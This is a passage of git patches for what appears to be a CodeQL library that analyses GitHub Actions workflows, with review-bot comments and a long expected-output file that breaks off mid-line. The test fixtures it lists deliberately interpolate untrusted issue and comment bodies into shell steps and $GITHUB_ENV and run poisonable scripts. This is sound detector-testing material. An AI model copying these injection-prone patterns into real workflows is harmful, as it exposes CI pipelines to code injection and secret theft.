_, file_expr, raw_content, _) and + multiLineFileWrite(script.getRawScript(), _, file_expr, raw_content, _) and isParameterExpansion(file_expr, file_var, _, _) and content = trimQuotes(raw_content) ) 
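Review bot: `Bash::extractFileWrite` changes its first parameter from `string` to `BashShellScript` and drops it from the `bindingset`, but nothing visible marks the predicate `private`, so a caller outside these hunks that still passes raw script text would stop compiling. That is worth a search before merge. The predicate also has no QLDoc, and after this change it mixes two views of the script: single-line writes and workflow commands are matched per `getAStmt()`, multi-line writes against `getRawScript()`. Suggested doc: `/** Holds if script writes content to the file named by the variable file_var; single-line writes are matched per statement, multi-line writes on the raw script. */`. The predicate body is only partly visible between the -542 and -566 hunks.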
From 922ae57abaf8b68e4995c942aa7ef15796f66044 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:26:47 +0200 Subject: [PATCH 0633/1267] Fix LabelIf ControlCheck so that it recognizes checks not at the beginning of the expression --- ql/lib/codeql/actions/security/ControlChecks.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index c73b06ae530..a24fd44b865 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -165,7 +165,7 @@ class LabelIfCheck extends LabelCheck instanceof If { condition = normalizeExpr(this.getCondition()) and ( // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') - condition.regexpMatch("(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*") + condition.regexpMatch(".*(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*") or // eg: github.event.label.name == 'safe to test' condition.regexpMatch(".*\\bgithub\\.event\\.label\\.name\\s*==.*") From e6e170402169663b894a77c02b2d1585b134a12e Mon Sep 17 00:00:00 2001 
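Review bot: The new leading `.*` lets `LabelIfCheck` accept a `contains(github.event.pull_request.labels ...` call anywhere in the condition, while the `(^|[^!])` guard only rejects a `!` placed directly in front of `contains`. Depending on what `normalizeExpr` does (not visible here), conditions shaped like `! contains(...)`, `!(contains(...))` or `<other> || contains(...)` would likely now count as a label control check, even though the label does not gate the job in those cases. Since a recognised check is used elsewhere in this series to drop results (`not exists(ControlCheck check | check.protects(...))`), that is a false-negative risk. It is worth adding test workflows for those three shapes, plus a comment above the regex such as `// NOTE: textual match only; negation is recognised only as a literal '!contains(' and boolean structure is ignored`. The class body continues outside the hunk.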
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 10:26:51 +0200 Subject: [PATCH 0634/1267] Update tests --- ql/test/library-tests/test.expected | 1741 ++++++++++++++++- ql/test/library-tests/test.ql | 55 - .../.github/workflows/resolve-args.yml | 36 + .../CWE-829/.github/workflows/test26.yml | 22 + .../CWE-829/.github/workflows/test27.yml | 22 + .../CWE-829/.github/workflows/test28.yml | 20 + .../UntrustedCheckoutCritical.expected | 10 +- .../CWE-829/UntrustedCheckoutMedium.expected | 3 + 8 files changed, 1849 insertions(+), 60 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index e2fb80df77f..8d3e4193c69 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -1,2 +1,1739 @@ -ERROR: Ast::ShellScript is incompatible with string (test.ql:24,66-67) -ERROR: getCallee() cannot be resolved for type DataFlowPublic::CallNode (test.ql:62,79-88) +files +| .github/workflows/commands.yml:0:0:0:0 | .github/workflows/commands.yml | +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline2.yml:0:0:0:0 | .github/workflows/multiline2.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | +| .github/workflows/shell.yml:0:0:0:0 | .github/workflows/shell.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| 
.github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:34:9:40:6 | Run 
Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| 
.github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run 
Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run 
Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:15:16:15:25 | bash -step | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run 
Step | .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:34:16:34:25 | bash -step | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:37:16:37:19 | pwsh | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a 
$GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> 
$GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| 
.github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| 
.github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:7:16:7:19 | pwsh | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | 